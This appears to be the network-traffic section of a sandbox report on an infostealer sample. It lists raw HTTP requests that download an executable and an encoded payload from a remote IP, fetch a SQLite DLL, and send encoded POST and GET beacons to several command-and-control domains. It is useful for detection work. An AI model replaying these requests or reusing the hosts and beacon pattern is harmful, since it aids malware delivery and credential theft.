Network Analysis

GET /99/hkcmd.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Host: 103.167.90.55 Connection: Keep-Alive

HTTP/1.1 200 OK Date: Fri, 02 Jun 2023 00:27:18 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 Last-Modified: Thu, 01 Jun 2023 05:38:26 GMT ETag: "52030-5fd0ad87039cf" Accept-Ranges: bytes Content-Length: 335920 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload

GET /ui/BkPIPfo50.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0 Host: 103.167.90.55 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 02 Jun 2023 00:28:14 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 Last-Modified: Thu, 01 Jun 2023 05:36:36 GMT ETag: "2e840-5fd0ad1e832d7" Accept-Ranges: bytes Content-Length: 190528 Content-Type: application/octet-stream

POST /edd5/ HTTP/1.1 Host: www.tsygy.com Connection: close Content-Length: 173 Cache-Control: no-cache Origin: http://www.tsygy.com User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.tsygy.com/edd5/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Server: Nginx Microsoft-HTTPAPI/2.0 X-Powered-By: Nginx Date: Fri, 02 Jun 2023 00:28:26 GMT Connection: close

GET /edd5/?Vq4=0zWrLbrK/n/crHNT6XWbazzyOkAFlY5wAyzxNZ31JHzq7YtcKQLNKjVX8hOMaVRgTWN6phnteU41MIGUFEgpbn8hSR7tLd8nwbGBlnI=&8m=GkarpqkkiApJ HTTP/1.1 Host: www.tsygy.com Connection: close

HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Server: Nginx Microsoft-HTTPAPI/2.0 X-Powered-By: Nginx Date: Fri, 02 Jun 2023 00:28:28 GMT Connection: close

GET /2020/sqlite-dll-win32-x86-3310000.zip HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Host: www.sqlite.org Connection: Keep-Alive

HTTP/1.1 200 OK Connection: keep-alive Date: Fri, 02 Jun 2023 00:28:34 GMT Last-Modified: Sun, 26 Jan 2020 18:03:34 GMT Cache-Control: max-age=120 ETag: "m5e2dd476s791e6" Content-type: application/zip; charset=utf-8 Content-length: 496102

POST /edd5/ HTTP/1.1 Host: www.questionsiair.com Connection: close Content-Length: 3413 Cache-Control: no-cache Origin: http://www.questionsiair.com User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.questionsiair.com/edd5/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Fri, 02 Jun 2023 00:28:43 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close

POST /edd5/ HTTP/1.1 Host: www.questionsiair.com Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.questionsiair.com User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.questionsiair.com/edd5/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Fri, 02 Jun 2023 00:28:45 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close

GET /edd5/?Vq4=hd+MiuAM1sNgn2KKrvxGMQVkxBuY4gX7KUKmBEuP5SsY3EU+WiZtPKf+rsfA1HVltqCjvKcN1lqDkwHkFvRs61iUICR2J2/9IuvNI10=&8m=GkarpqkkiApJ HTTP/1.1 Host: www.questionsiair.com Connection: close

HTTP/1.1 404 Not Found server: openresty/1.13.6.1 date: Fri, 02 Jun 2023 00:28:48 GMT content-type: text/html content-length: 175 connection: close

POST /edd5/ HTTP/1.1 Host: www.delectabledish.cfd Connection: close Content-Length: 3413 Cache-Control: no-cache Origin: http://www.delectabledish.cfd User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.delectabledish.cfd/edd5/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 308 Permanent Redirect Date: Fri, 02 Jun 2023 00:28:53 GMT Transfer-Encoding: chunked Connection: close Location: /edd5 Refresh: 0;url=/edd5 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SVrtc1U2IcB%2F9pq0mz%2BCWpZduG%2FPQD2xcgPPauVPtWoQ0qWq8SbdMGYAZTT%2BtaJlRGCm00c5qcxSjzrHqT1wdn4HU8TSePYtnIvYEkQ0%2FmP5UaKMz716Yozj4xWIJpXs6Jf%2BLfGgNg%2FY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7d0b9432c94b831c-KIX alt-svc: h3=":443"; ma=86400

POST /edd5/ HTTP/1.1 Host: www.delectabledish.cfd Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.delectabledish.cfd User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.delectabledish.cfd/edd5/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 308 Permanent Redirect Date: Fri, 02 Jun 2023 00:28:56 GMT Transfer-Encoding: chunked Connection: close Location: /edd5 Refresh: 0;url=/edd5 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OITaiQtD3M8RtBu0GIptEW6FDWEnm6CsAMuUHbFKANckcby5D65dZgZlJpXVbS4377XeBQ3%2Fu9K7BIbryJrp%2F3%2BiA0Ir%2FEzUntdIKdWAySaBmbAJdY5jyNfrpiMBqBpsVPmjuogjb7jz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7d0b94428c681a25-KIX alt-svc: h3=":443"; ma=86400

GET /edd5/?Vq4=B2RmKfOrokGI0VMFxgvpsJcIBWM8D45hL/kILG7EqcUaTaNL/jsj7dPSy+GDoUSupUzJBMrmMK/g0HyeS/KvyJee+DSx/b1WztsuAK0=&8m=GkarpqkkiApJ HTTP/1.1 Host: www.delectabledish.cfd Connection: close

HTTP/1.1 308 Permanent Redirect Date: Fri, 02 Jun 2023 00:28:58 GMT Transfer-Encoding: chunked Connection: close Location: /edd5?Vq4=B2RmKfOrokGI0VMFxgvpsJcIBWM8D45hL%2FkILG7EqcUaTaNL%2Fjsj7dPSy%20GDoUSupUzJBMrmMK%2Fg0HyeS%2FKvyJee%20DSx%2Fb1WztsuAK0%3D&8m=GkarpqkkiApJ Refresh: 0;url=/edd5?Vq4=B2RmKfOrokGI0VMFxgvpsJcIBWM8D45hL%2FkILG7EqcUaTaNL%2Fjsj7dPSy%20GDoUSupUzJBMrmMK%2Fg0HyeS%2FKvyJee%20DSx%2Fb1WztsuAK0%3D&8m=GkarpqkkiApJ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ny79n9p1ReNvR7%2B8HJj4j7J5YeOcCUw3QRM0oL7fgRzY3X1mSt6RsQhjALxX8QqscXa%2Bc272X0yUZltnBpPzNf9cXZJCbPxFSS%2B55OYgFODjux1Va913D502PpiuBsx5keUCUYr1luD%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7d0b945259511a00-KIX alt-svc: h3=":443"; ma=86400

POST /edd5/ HTTP/1.1 Host: www.atasayjewelryiraq.com Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.atasayjewelryiraq.com User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.atasayjewelryiraq.com/edd5/ Accept-Language: en-US Accept-Encoding: gzip, deflate

GET /edd5/?Vq4=jvXZqsnw1Hx/W21rUDmQzW3biwmglN1weTGDvxHKn0WnuNbYAvWZsgmLMoPDO/nbmfZHAr4HMnaky/TljtLbqoPeESkGF2B8Vywz4pI=&8m=GkarpqkkiApJ HTTP/1.1 Host: www.atasayjewelryiraq.com Connection: close

HTTP/1.1 200 OK Server: hcdn Date: Fri, 02 Jun 2023 00:29:09 GMT Content-Type: text/html Content-Length: 10066 Connection: close Vary: Accept-Encoding x-hcdn-request-id: 93e61c7af6217ff45c6a77451e7d58fd-fast-edge2 Expires: Fri, 02 Jun 2023 00:29:08 GMT Cache-Control: no-cache Accept-Ranges: bytes